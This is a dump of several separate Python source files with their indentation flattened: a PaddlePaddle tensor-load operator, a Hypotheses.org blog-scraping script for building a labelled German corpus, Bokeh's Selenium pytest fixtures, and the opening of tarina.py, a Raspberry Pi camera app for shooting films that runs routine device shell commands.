def load(out, file_path, load_as_fp16=None):
"""
The load operator loads a LoDTensor / SelectedRows variable from a disk file.
Args:
out(Variable): The LoDTensor / SelectedRows to be loaded.
file_path(str): The variable will be loaded from "file_path".
load_as_fp16(bool): If true, the tensor is first loaded and then converted to float16 data type. Otherwise, the tensor is loaded directly without data type conversion. Default is False.
Returns:
None
Examples:
.. code-block:: python
import paddle.fluid as fluid
tmp_tensor = fluid.layers.create_tensor(dtype='float32')
fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, attrs=attrs)
|
Blogs_Preprocessing_I.py
|
# coding: utf-8
# # Building the dataset
# Texts: blog posts from the blogging platform Hypotheses.org
# Labels: the topics and disciplines chosen by the researchers
#
# Author: Maria Hartmann
# In[2]:
# Import libraries
import numpy as np
import csv # for csv output
import requests # HTTP for humans
from bs4 import BeautifulSoup # module for web scraping
import _thread
from threading import Thread # to start parallel threads
import time # to get the processing time
import os
import shutil # to move files
from collections import Counter # to count element appearences in a list
# Read in the source file metadata.csv
# In[4]:
# read metadata.csv
folder = '../Preprocessing'
file = folder+'/metadata.csv'
lines = [] # all lines from metadata
de_lines = [] # german lines from metadata
with open(file, 'r', encoding='utf-8') as openfile:
metadata = openfile.readlines()
openfile.close()
for i, line in enumerate(metadata):
lines.append(line.replace('\n', '').split(";"))
if lines[i][1] == "de":
de_lines.append(lines[i])
else:
continue
# de_lines converted to a numpy array because access is faster, but it can no longer be modified
np_lines = np.array(de_lines)
print(type(np_lines))
# Filter blogs without disciplines out of metadata.csv and write them to unlabeled_lines.csv
# Write faulty blogs (e.g. no longer available, or a one-off post in another language) to error_lines.csv
# write the remaining German data to de_lines.csv
with open(folder+'/de_lines.csv', 'w', newline='', encoding="utf-8") as decsv, open(folder+'/unlabeled_lines.csv', 'w', newline='', encoding="utf-8") as unlabeledcsv, open(folder+'/error_lines.csv', 'w', newline='', encoding="utf-8") as errorcsv:
de = csv.writer(decsv, delimiter = ";")
unlabeled = csv.writer(unlabeledcsv, delimiter = ";")
errors = csv.writer(errorcsv, delimiter = ";")
for i, line in enumerate(np_lines):
if (np_lines[i][7] == "marginalie") or (np_lines[i][7] == "ciera"):
# no disciplines assigned,
unlabeled.writerow(line)
elif (np_lines[i][7] == "holocaustwebsites"):
# holocaustwebsites filtered out because this website is no longer available
# everything else is filtered via the blog-posts-per-blog index
#elif (np_lines[i][7] == "holocaustwebsites") or (np_lines[i][7] == "aleesp") or (np_lines[i][7] == "filstoria") or (np_lines[i][7] == "atb"):
# aleesp filtered out because it is actually a Spanish blog and appears only once in the German corpus
# filstoria filtered out because it is actually an Italian blog and appears only once in the German corpus
# atb filtered out because Disciplines and Themes are faulty (contain a colon) and the blog is mostly English
errors.writerow(line)
else:
de.writerow(line)
# read de_lines.csv into data so that the error lines do not have to be read in as well
data = [] # all lines from de_lines, without errors
bloglist = [] # all blogs that appear in de_lines
with open(folder+'/de_lines.csv', 'r', encoding='utf-8') as openfile:
de_csv = openfile.readlines()
openfile.close()
for i, line in enumerate(de_csv):
data.append(line.replace('\n', '').split(";"))
bloglist.append(data[i][7])
# In[5]:
# remove blogs with fewer than 10 posts, so that blogs in other languages with only a few German posts are filtered out
c = Counter(bloglist)
blog_select = []
counter = 0
for key in sorted(c):
if c[key] < 10:
#print("%s: %s" % (key, c[key]))
blog_select.append(key)
counter += c[key]
trainset = [x for x in data if x[7] not in blog_select]
print(len(data))
print(len(trainset))
print(len(bloglist))
print(len(blog_select))
print(counter)
# Read out the class labels
# In[ ]:
# crawl subjects and themes
errorlist = []
def get_disciplines(index):
#print("\nline 1:", line)
#print(i+1)
#print(line)
url = trainset[index][9]
#print(i, "\npage:", url)
page = requests.get(url)
soup = BeautifulSoup(page.text, "html.parser")
if(soup.find(title="Zum Hypotheses-Katalogeintrag")):
element = soup.find(title="Zum Hypotheses-Katalogeintrag")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="Zum OpenEdition-Katalogeintrag")):
element = soup.find(title="Zum OpenEdition-Katalogeintrag")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="Ce carnet dans le catalogue d'Hypothèses")):
element = soup.find(title="Ce carnet dans le catalogue d'Hypothèses")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="Ce carnet dans le catalogue d'OpenEdition")):
element = soup.find(title="Ce carnet dans le catalogue d'OpenEdition")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="This blog in Hypotheses catalogue")):
element = soup.find(title="This blog in Hypotheses catalogue")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="This blog in OpenEdition catalogue")):
element = soup.find(title="This blog in OpenEdition catalogue")
link = element.get("href")
#print("link:", link)
else:
print("Kein Open-Edition-Link gefunden!", index, trainset[index])
trainset[index].append("Kein Open-Edition-Link gefunden!")
errorlist.append(trainset[index])
return
subpage = requests.get(link)
#print(subpage)
subsoup = BeautifulSoup(subpage.text, "html.parser")
morelinks = subsoup.find(class_="more-links")
disciplines = []
for i, child in enumerate(morelinks.children):
#print("disciplines:", i, child)
disciplines.append(child)
#print(disciplines[9])
#print(disciplines[14])
if len(disciplines) > 13:
trainset[index].append(disciplines[9].replace("\n", "").strip())
trainset[index].append(disciplines[14].replace("\n", "").strip())
elif len(disciplines) > 8:
trainset[index].append(disciplines[9].replace("\n", "").replace('"', '').strip())
else:
print("Keine Disziplinen gefunden!", index, trainset[index])
trainset[index].append("Keine Disziplinen gefunden!")
errorlist.append(trainset[index])
#print("\nline 2:", line)
#print("trainset[i]:", trainset[i])
#print("FERTIG")
start = time.time()
# Create two threads as follows
threads = []
for i in range(0,len(trainset)):
if (i % 100 == 0):
print("Schon wieder 100 Threads gestartet:", i)
try:
t = Thread(target = get_disciplines, args=(i, ))
t.start()
threads.append(t)
except:
print ("Error: unable to start thread")
for t in threads:
# join() makes sure that the main program waits until all threads have terminated
t.join()
print("Laufzeit in Minuten:", (time.time() - start) / 60)
# In[5]:
# show errors
print(len(errorlist))
print(errorlist)
# Saving the German blog posts and their metadata
# In[6]:
# add ; subjects ; themes to de_labeled_metadata.csv
print(type(trainset))
trainset.sort()
np_lines = np.array(trainset)
#print(np_lines)
with open(folder+'/de_labeled_metadata.csv', 'w', newline='', encoding="utf-8") as labeledcsv:
labeled = csv.writer(labeledcsv, delimiter = ";")
labeled.writerow(["filename", "language", "author", "numwords", "category", "date", "licence", "blog", "post", "url", "title", "disciplines", "themes"])
for i, line in enumerate(np_lines):
labeled.writerow(line)
# In[8]:
# move all german files to folder txt_de
newfolder = folder+'/txt_de'
if not os.path.exists(newfolder):
os.makedirs(newfolder)
newfilelist = os.listdir(newfolder)
newfilelist.sort()
oldfolder = folder+'/txt'
filelist = os.listdir(oldfolder)
filelist.sort()
#print(trainset[0])
#print(len(trainset))
#trainset.sort()
for line in trainset:
file = line[0] + '.txt'
if (file in filelist) and (file not in newfilelist):
shutil.copy2((oldfolder+'/'+file), (newfolder+'/'+file))
#print("deutsch: ", (oldfolder+'/'+file))
else:
#print("Nicht deutsch")
continue
# In[9]:
# 100 missing files in folder 'txt'
missing = []
filelist = os.listdir(newfolder)
filelist.sort()
#trainset.sort()
for line in trainset:
file = line[0] + '.txt'
if file not in filelist:
missing.append(file)
#print("deutsch: ", (directory+'/'+file))
else:
#print("Nicht deutsch")
continue
print(missing)
print(len(missing))
# In[10]:
# open german metadata file: de_labeled_metadata.csv
# and every Blogpost
filelist = os.listdir(newfolder)
filelist.sort()
lines = [] # all blog posts listed in de_labeled_metadata.csv
corpus = [] # German-language blog posts
labels = [] # corresponding labels
errors = [] # blog posts listed in metadata.csv but not contained in hypoposts-txt.zip
filenames = [] # blog posts without errors
onelabel = [] # blog posts with only one kind of label (topic or discipline)
with open(folder+'/de_labeled_metadata.csv', 'r', encoding='utf-8') as openfile:
metadata = openfile.readlines()
openfile.close()
#print(metadata[0])
for i, line in enumerate(metadata[1:]):
#print(i)
lines.append(line.split(";"))
#print("\nFile:", lines[i][0])
#print("Themes:", lines[i][11])
#print("Disciplines:", lines[i][12])
file = (lines[i][0] + '.txt')
#print("Filename:", file)
if file in filelist:
with open((newfolder+'/'+file), 'r', encoding='utf-8') as textfile:
text = textfile.read()
textfile.close()
filenames.append(file)
corpus.append(text)
if len(lines[i]) > 12:
labels.append(lines[i][11] + "; " + lines[i][12])
elif len(lines[i]) > 10:
labels.append(lines[i][11])
onelabel.append(file)
else:
print("keine Disziplin gefunden!", lines[i])
else:
print("File nicht gefunden!", file)
errors.append(file)
continue
print("\n")
print(len(corpus))
print(len(labels))
print(len(filenames))
print(len(errors))
print(len(onelabel))
for blog in onelabel:
print(blog)
# Building the data basis: file names, blog posts and the corresponding classes (topics and disciplines)
# In[11]:
# write csv-file de_labeled_corpus.csv: filename, classes, text
with open(folder+'/de_labeled_corpus.csv', 'w', newline='', encoding="utf-8") as labeledcsv:
labeled = csv.writer(labeledcsv, delimiter = ";")
labeled.writerow(["filename", "classes", "text"])
for file, label, line in zip(filenames, labels, corpus):
labeled.writerow([file.replace('\n', ' '), label.replace('\n', ''), line.replace('\n', ' ')])
|
project.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Define a Pytest plugin for Bokeh-specific testing tools
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import socket
import time
from contextlib import closing
from threading import Thread
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Tuple,
)
# External imports
import pytest
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler
from typing_extensions import Protocol
if TYPE_CHECKING:
from selenium.webdriver.common.keys import _KeySeq
from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.remote.webelement import WebElement
# Bokeh imports
import bokeh.server.views.ws as ws
from bokeh._testing.util.selenium import (
INIT,
RESULTS,
find_matching_element,
get_events_el,
)
from bokeh.application.handlers.function import ModifyDoc
from bokeh.io import save
from bokeh.models import LayoutDOM, Plot
from bokeh.server.server import Server
if TYPE_CHECKING:
from bokeh._testing.plugins.file_server import SimpleWebServer
from bokeh.model import Model
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
pytest_plugins = (
"bokeh._testing.plugins.project",
"bokeh._testing.plugins.file_server",
"bokeh._testing.plugins.selenium",
)
__all__ = (
'bokeh_app_info',
'bokeh_model_page',
'bokeh_server_page',
'find_free_port',
'output_file_url',
'single_plot_page',
'test_file_path_and_url',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
@pytest.fixture
def output_file_url(request: pytest.FixtureRequest, file_server: SimpleWebServer) -> str:
from bokeh.io import output_file
filename = request.function.__name__ + '.html'
file_obj = request.fspath.dirpath().join(filename)
file_path = file_obj.strpath
url = file_path.replace('\\', '/') # Windows-proof
output_file(file_path, mode='inline')
def tear_down() -> None:
if file_obj.isfile():
file_obj.remove()
request.addfinalizer(tear_down)
return file_server.where_is(url)
@pytest.fixture
def test_file_path_and_url(request: pytest.FixtureRequest, file_server: SimpleWebServer) -> Tuple[str, str]:
filename = request.function.__name__ + '.html'
file_obj = request.fspath.dirpath().join(filename)
file_path = file_obj.strpath
url = file_path.replace('\\', '/') # Windows-proof
def tear_down() -> None:
if file_obj.isfile():
file_obj.remove()
request.addfinalizer(tear_down)
return file_path, file_server.where_is(url)
class _ExitHandler(RequestHandler):
def initialize(self, io_loop: IOLoop) -> None:
self.io_loop = io_loop
async def get(self, *args: Any, **kwargs: Any) -> None:
self.io_loop.stop()
def find_free_port() -> int:
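    ''' Return a currently free TCP port, found by binding a throwaway
    socket to port 0 and reading back the port number assigned by the OS.
    '''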
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
return s.getsockname()[1]
class BokehAppInfo(Protocol):
def __call__(self, modify_doc: ModifyDoc) -> Tuple[str, ws.MessageTestPort]: ...
class HasNoConsoleErrors(Protocol):
def __call__(self, webdriver: WebDriver) -> bool: ...
@pytest.fixture
def bokeh_app_info(request: pytest.FixtureRequest, driver: WebDriver) -> BokehAppInfo:
''' Start a Bokeh server app and return information needed to test it.
Returns a tuple (url, message_test_port), where the latter is an instance of
the ``MessageTestPort`` dataclass that will contain all messages the Bokeh
server sends and receives while running during the test.
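A sketch of intended usage (``make_doc`` here stands for a user-supplied
``ModifyDoc`` callback and is not defined in this module):
def test_my_app(bokeh_app_info) -> None:
    url, msg_port = bokeh_app_info(make_doc)
    # drive a webdriver against ``url``, then inspect
    # msg_port.sent and msg_port.received afterwards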
'''
def func(modify_doc: ModifyDoc) -> Tuple[str, ws.MessageTestPort]:
ws._message_test_port = ws.MessageTestPort(sent=[], received=[])
port = find_free_port()
def worker() -> None:
io_loop = IOLoop()
server = Server({'/': modify_doc},
port=port,
io_loop=io_loop,
extra_patterns=[('/exit', _ExitHandler, dict(io_loop=io_loop))])
server.start()
server.io_loop.start()
t = Thread(target=worker)
t.start()
def cleanup() -> None:
driver.get(f"http://localhost:{port}/exit")
# XXX (bev) this line is a workaround for https://github.com/bokeh/bokeh/issues/7970
# and should be removed when that issue is resolved
driver.get_log('browser')
ws._message_test_port = None
t.join()
request.addfinalizer(cleanup)
return f"http://localhost:{port}/", ws._message_test_port
return func
class _ElementMixin:
_driver: WebDriver
def click_element_at_position(self, element: WebElement, x: int, y: int) -> None:
actions = ActionChains(self._driver)
actions.move_to_element_with_offset(element, x, y)
actions.click()
actions.perform()
def double_click_element_at_position(self, element: WebElement, x: int, y: int) -> None:
actions = ActionChains(self._driver)
actions.move_to_element_with_offset(element, x, y)
actions.click()
actions.click()
actions.perform()
def drag_element_at_position(self, element: WebElement, x: int, y: int, dx: int, dy: int, mod: _KeySeq | None = None) -> None:
actions = ActionChains(self._driver)
if mod:
actions.key_down(mod)
actions.move_to_element_with_offset(element, x, y)
actions.click_and_hold()
actions.move_by_offset(dx, dy)
actions.release()
if mod:
actions.key_up(mod)
actions.perform()
def send_keys(self, *keys: _KeySeq) -> None:
actions = ActionChains(self._driver)
actions.send_keys(*keys)
actions.perform()
class _CanvasMixin(_ElementMixin):
canvas: WebElement
def click_canvas_at_position(self, plot: Plot, x: int, y: int) -> None:
events_el = get_events_el(self._driver, plot)
self.click_element_at_position(events_el, x, y)
def double_click_canvas_at_position(self, plot: Plot, x: int, y: int) -> None:
events_el = get_events_el(self._driver, plot)
self.double_click_element_at_position(events_el, x, y)
def drag_canvas_at_position(self, plot: Plot, x: int, y: int, dx: int, dy: int, mod: _KeySeq | None = None) -> None:
events_el = get_events_el(self._driver, plot)
self.drag_element_at_position(events_el, x, y, dx, dy, mod)
def click_custom_action(self) -> None:
button = find_matching_element(self._driver, ".bk-toolbar-button-custom-action")
button.click()
def get_toolbar_button(self, name: str) -> WebElement:
return find_matching_element(self._driver, f".bk-tool-icon-{name}")
class _BokehPageMixin(_ElementMixin):
test_div: WebElement
_driver: WebDriver
_has_no_console_errors: HasNoConsoleErrors
@property
def results(self) -> Dict[str, Any]:
WebDriverWait(self._driver, 10).until(EC.staleness_of(self.test_div))
self.test_div = find_matching_element(self._driver, ".bokeh-test-div")
return self._driver.execute_script(RESULTS)
@property
def driver(self) -> WebDriver:
return self._driver
def init_results(self) -> None:
self._driver.execute_script(INIT)
self.test_div = find_matching_element(self._driver, ".bokeh-test-div")
def has_no_console_errors(self) -> bool:
return self._has_no_console_errors(self._driver)
class _BokehModelPage(_BokehPageMixin):
def __init__(self, model: LayoutDOM, driver: WebDriver, output_file_url: str, has_no_console_errors: HasNoConsoleErrors) -> None:
self._driver = driver
self._model = model
self._has_no_console_errors = has_no_console_errors
save(self._model)
self._driver.get(output_file_url)
self.init_results()
await_ready(driver, model)
BokehModelPage = Callable[[LayoutDOM], _BokehModelPage]
@pytest.fixture()
def bokeh_model_page(driver: WebDriver, output_file_url: str, has_no_console_errors: HasNoConsoleErrors) -> BokehModelPage:
def func(model: LayoutDOM) -> _BokehModelPage:
return _BokehModelPage(model, driver, output_file_url, has_no_console_errors)
return func
class _SinglePlotPage(_BokehModelPage, _CanvasMixin):
# model may be a layout, but should only contain a single plot
def __init__(self, model: LayoutDOM, driver: WebDriver, output_file_url: str, has_no_console_errors: HasNoConsoleErrors) -> None:
super().__init__(model, driver, output_file_url, has_no_console_errors)
SinglePlotPage = Callable[[LayoutDOM], _SinglePlotPage]
@pytest.fixture()
def single_plot_page(driver: WebDriver, output_file_url: str,
has_no_console_errors: HasNoConsoleErrors) -> SinglePlotPage:
def func(model: LayoutDOM) -> _SinglePlotPage:
return _SinglePlotPage(model, driver, output_file_url, has_no_console_errors)
return func
class _BokehServerPage(_BokehPageMixin, _CanvasMixin):
def __init__(self, modify_doc: ModifyDoc, driver: WebDriver, bokeh_app_info: BokehAppInfo, has_no_console_errors: HasNoConsoleErrors) -> None:
self._driver = driver
self._has_no_console_errors = has_no_console_errors
self._app_url, self.message_test_port = bokeh_app_info(modify_doc)
time.sleep(0.1)
self._driver.get(self._app_url)
self.init_results()
def ready(driver: WebDriver) -> bool:
try:
await_all_ready(driver)
return True
except RuntimeError:
return False
WebDriverWait(self._driver, 10).until(ready)
BokehServerPage = Callable[[ModifyDoc], _BokehServerPage]
@pytest.fixture()
def bokeh_server_page(driver: WebDriver, bokeh_app_info: BokehAppInfo,
has_no_console_errors: HasNoConsoleErrors) -> BokehServerPage:
def func(modify_doc: ModifyDoc) -> _BokehServerPage:
return _BokehServerPage(modify_doc, driver, bokeh_app_info, has_no_console_errors)
return func
def await_ready(driver: WebDriver, root: Model) -> None:
script = """
const [root_id, done] = [...arguments];
(async function() {
const view = Bokeh.index[root_id]
if (view == null)
done(false)
else {
await view.ready
done(true)
}
})()
"""
if not driver.execute_async_script(script, root.id):
raise RuntimeError(f"could not find a root view for {root}")
def await_all_ready(driver: WebDriver) -> None:
script = """
const [done] = [...arguments];
(async function() {
const views = [...Object.values(Bokeh.index)]
if (views.length == 0)
done(false)
else {
await Promise.all(views.map((view) => view.ready))
done(true)
}
})()
"""
if not driver.execute_async_script(script):
raise RuntimeError("could not find any root views")
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
tarina.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ```````` `````` ``````` ``` ```` ``` ``````
# ` ``` ` `` ``` ``` ``` ``` ```` `` `` ```
# ``` ``````` ``` ```` ``` ```````` ``````
# ``` `` `` `````` ``` `` ````` ``` ``
# ``` ``` ``` ``` ``` ``` ``` ```` ``` ```
# ```` ``` ```` ``` ``` ``` ```` ``` ``` ````
# a Muse of Filmmaking
# https://tarina.org
import picamerax as picamera
import numpy as np
import string
import os
import time
import multiprocessing as mp
from subprocess import call
from subprocess import Popen
from omxplayer import OMXPlayer
import subprocess
import sys
import pickle
import RPi.GPIO as GPIO
from PIL import Image
import socket
import configparser
import shortuuid
import smbus
#import shlex
from blessed import Terminal
# bless the code!
term = Terminal()
#DEBIAN VERSION
pipe = subprocess.check_output('lsb_release -c -s', shell=True)
debianversion = pipe.decode().strip()
print('running debian ' + debianversion)
#I2CBUTTONS
probei2c = 0
while probei2c < 10:
try:
if debianversion == "stretch":
os.system('sudo modprobe i2c-dev')
bus = smbus.SMBus(3) # Rev 2 Pi uses 1
else:
os.system('sudo modprobe i2c-dev')
bus = smbus.SMBus(11) # Rev 2 Pi uses 1
DEVICE = 0x20 # Device address (A0-A2)
IODIRB = 0x0d # Pin pullups B-side
IODIRA = 0x00 # Pin pullups A-side 0x0c
IODIRApullup = 0x0c # Pin pullups A-side 0x0c
GPIOB = 0x13 # Register B-side for inputs
GPIOA = 0x12 # Register A-side for inputs
OLATA = 0x14 # Register for outputs
bus.write_byte_data(DEVICE,IODIRB,0xFF) # set all gpiob to input
bus.write_byte_data(DEVICE,IODIRApullup,0xF3) # set two pullup inputs and two outputs
bus.write_byte_data(DEVICE,IODIRA,0xF3) # set two inputs and two outputs
bus.write_byte_data(DEVICE,OLATA,0x4)
print("yes, found em i2c buttons!")
i2cbuttons = True
break
except:
print("could not find i2c buttons!! running in keyboard only mode")
print("trying again...")
i2cbuttons = False
probei2c += 1
time.sleep(1)
#MAIN
def main():
global headphoneslevel, miclevel, tarinafolder, screen, loadfilmsettings, plughw, channels
# Get path of the current dir, then use it as working directory:
rundir = os.path.dirname(__file__)
if rundir != '':
os.chdir(rundir)
filmfolder = "/home/pi/Videos/"
if os.path.isdir(filmfolder) == False:
os.makedirs(filmfolder)
tarinafolder = os.getcwd()
#MENUS
menu = 'FILM:', 'SCENE:', 'SHOT:', 'TAKE:', '', 'SHUTTER:', 'ISO:', 'RED:', 'BLUE:', 'BRIGHT:', 'CONT:', 'SAT:', 'FLIP:', 'BEEP:', 'LENGTH:', 'HW:', 'CH:', 'MIC:', 'PHONES:', 'COMP:', 'TIMELAPSE', 'LENS:', 'DSK:', 'SHUTDOWN', 'SRV:', 'WIFI:', 'UPDATE', 'UPLOAD', 'BACKUP', 'LOAD', 'NEW', 'TITLE', 'LIVE:'
#STANDARD VALUES (some of these may not be needed, should do some clean up)
abc = '_','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','1','2','3','4','5','6','7','8','9','0'
keydelay = 0.0555
selectedaction = 0
selected = 0
awb = 'auto', 'sunlight', 'cloudy', 'shade', 'tungsten', 'fluorescent', 'incandescent', 'flash', 'horizon'
awbx = 0
awb_lock = 'no'
headphoneslevel = 40
miclevel = 50
recording = False
retake = False
lastmenu = ''
rendermenu = True
overlay = None
reclenght = 0
t = 0
rectime = ''
scene = 1
shot = 1
take = 1
filmname = ''
beeps = 0
beepcountdown = 0
beeping = False
lastbeep = time.time()
flip = 'no'
between = 30
duration = 0.2
lenses = os.listdir('lenses/')
lens = lenses[0]
buttontime = time.time()
pressed = ''
buttonpressed = False
holdbutton = ''
updatethumb = False
delayerr = ''
loadfilmsettings = True
oldsettings = ''
comp = 1
yankedscene = ''
cuttedscene = ''
cuttedshot = ''
yankedshot = ''
stream = ''
live = 'no'
plughw = 0 #default audio device
channels = 1 #default mono
#SAVE SETTINGS FREQUENCY IN SECS
pausetime = time.time()
savesettingsevery = 10
#TARINA VERSION
f = open(tarinafolder + '/VERSION')
tarinaversion = f.readline()
tarinavername = f.readline()
#SYSTEM CONFIGS (turn off hdmi)
run_command('tvservice -o')
#Kernel page cache optimization for sd card
run_command('sudo ' + tarinafolder + '/extras/sdcardhack.sh')
#COUNT DISKSPACE
disk = os.statvfs(filmfolder)
diskleft = str(int(disk.f_bavail * disk.f_frsize / 1024 / 1024 / 1024)) + 'Gb'
#START INTERFACE
startinterface()
camera = startcamera(lens)
#LOAD FILM AND SCENE SETTINGS
try:
filmname = getfilms(filmfolder)[0][0]
except:
filmname = ''
#THUMBNAILCHECKER
oldscene = scene
oldshot = shot
oldtake = take
#TURN OFF WIFI AND TARINA SERVER
try:
if sys.argv[1] == 'default':
serverstate = 'off'
wifistate = 'off'
run_command('sudo iwconfig wlan0 txpower off')
serverstate = tarinaserver(False)
except:
serverstate = 'off'
wifistate = 'on'
#serverstate = tarinaserver(False)
#TO_BE_OR_NOT_TO_BE
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
recordable = not os.path.isfile(foldername + filename + '.mp4') and not os.path.isfile(foldername + filename + '.h264')
#--------------MAIN LOOP---------------#
while True:
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if buttonpressed == True:
flushbutton()
#event = screen.getch()
if recording == False:
#SHUTDOWN
if pressed == 'middle' and menu[selected] == 'SHUTDOWN':
writemessage('Hold on shutting down...')
time.sleep(1)
run_command('sudo shutdown -h now')
#PEAKING
elif pressed == 'peak' and recordable == True:
if shot > 1:
peakshot = shot - 1
peaktake = counttakes(filmname, filmfolder, scene, peakshot)
p_imagename = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/shot' + str(peakshot).zfill(3) + '/take' + str(peaktake).zfill(3) + '.jpeg'
overlay = displayimage(camera, p_imagename, overlay)
while holdbutton == 'peak':
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
writemessage('peaking ' + str(peakshot))
overlay = removeimage(camera, overlay)
#TIMELAPSE
elif pressed == 'middle' and menu[selected] == 'TIMELAPSE':
overlay = removeimage(camera, overlay)
takes = counttakes(filmname, filmfolder, scene, shot)
if takes > 0:
shot = countshots(filmname, filmfolder, scene) + 1
take = 1
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
renderedfilename, between, duration = timelapse(beeps,camera,foldername,filename,between,duration)
if renderedfilename != '':
#render thumbnail
#writemessage('creating thumbnail')
#run_command('avconv -i ' + foldername + filename + '.mp4 -frames 1 -vf scale=800:340 ' + foldername + filename + '.jpeg')
updatethumb = True
#VIEW SCENE
elif pressed == 'view' and menu[selected] == 'SCENE:':
filmfiles = shotfiles(filmfolder, filmname, scene)
writemessage('Loading scene...')
if len(filmfiles) > 0:
#Check if rendered video exist
camera.stop_preview()
#renderfilename, newaudiomix = renderscene(filmfolder, filmname, scene)
renderfilename = renderfilm(filmfolder, filmname, comp, scene, False)
playdub(renderfilename, 'scene')
camera.start_preview()
#VIEW FILM
elif pressed == 'view' and menu[selected] == 'FILM:':
filmfiles = viewfilm(filmfolder, filmname)
writemessage('Loading film...')
if len(filmfiles) > 0:
camera.stop_preview()
renderfilename = renderfilm(filmfolder, filmname, comp, 0, True)
playdub(renderfilename, 'film')
camera.start_preview()
#VIEW SHOT OR TAKE
elif pressed == 'view':
takes = counttakes(filmname, filmfolder, scene, shot)
writemessage('Loading clip...')
if takes > 0:
removeimage(camera, overlay)
camera.stop_preview()
foldername = filmfolder + filmname + '/scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
compileshot(foldername + filename)
trim = playdub(foldername + filename, 'shot')
if trim:
take = counttakes(filmname, filmfolder, scene, shot)+1
trim_filename = foldername + 'take' + str(take).zfill(3)
videotrim(foldername + filename, trim_filename, trim[0], trim[1])
imagename = foldername + filename + '.jpeg'
overlay = displayimage(camera, imagename, overlay)
camera.start_preview()
#DUB SCENE
elif pressed == 'middle' and menu[selected] == 'SCENE:':
newdub = clipsettings(filmfolder, filmname, scene, plughw)
if newdub:
camera.stop_preview()
renderfilename, newaudiomix = renderscene(filmfolder, filmname, scene)
playdub(renderfilename, 'dub')
run_command('sox -V0 -G /dev/shm/dub.wav ' + newdub)
vumetermessage('new scene dubbing made!')
camera.start_preview()
time.sleep(1)
else:
vumetermessage('see ya around!')
#DUB FILM
elif pressed == 'middle' and menu[selected] == 'FILM:':
newdub = clipsettings(filmfolder, filmname, '', plughw)
if newdub:
camera.stop_preview()
renderfilename = renderfilm(filmfolder, filmname, comp, 0, False)
playdub(renderfilename, 'dub')
run_command('sox -V0 -G /dev/shm/dub.wav ' + newdub)
vumetermessage('new film dubbing made!')
camera.start_preview()
time.sleep(1)
else:
vumetermessage('see ya around!')
#BACKUP
elif pressed == 'middle' and menu[selected] == 'BACKUP':
copytousb(filmfolder)
#UPLOAD
elif pressed == 'middle' and menu[selected] == 'UPLOAD':
if webz_on() == True:
filmfiles = viewfilm(filmfolder, filmname)
if len(filmfiles) > 0:
renderfilename = renderfilm(filmfolder, filmname, comp, 0, True)
cmd = uploadfilm(renderfilename, filmname)
if cmd != None:
stopinterface(camera)
try:
run_command(cmd)
except:
logger.warning('uploadfilm bugging')
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
selectedaction = 0
#LOAD FILM
elif pressed == 'middle' and menu[selected] == 'LOAD':
filmname = loadfilm(filmname, filmfolder)
loadfilmsettings = True
#UPDATE
elif pressed == 'middle' and menu[selected] == 'UPDATE':
if webz_on() == True:
stopinterface(camera)
tarinaversion, tarinavername = update(tarinaversion, tarinavername)
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
selectedaction = 0
#WIFI
elif pressed == 'middle' and menu[selected] == 'WIFI:':
stopinterface(camera)
run_command('wicd-curses')
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
#NEW FILM
elif (pressed == 'middle' and menu[selected] == 'NEW') or filmname == '':
newfilmname = nameyourfilm(filmfolder, filmname, abc, True)
if filmname != newfilmname:
filmname = newfilmname
os.makedirs(filmfolder + filmname)
writemessage('Good luck with your film ' + filmname + '!')
#make a filmhash
print('making filmhash...')
filmhash = shortuuid.uuid()
with open(filmfolder + filmname + '/.filmhash', 'w') as f:
f.write(filmhash)
updatethumb = True
updatemenu = True
scene = 1
shot = 1
take = 1
selectedaction = 0
else:
vumetermessage('')
#EDIT FILM NAME
elif (pressed == 'middle' and menu[selected] == 'TITLE') or filmname == '':
newfilmname = nameyourfilm(filmfolder, filmname, abc, False)
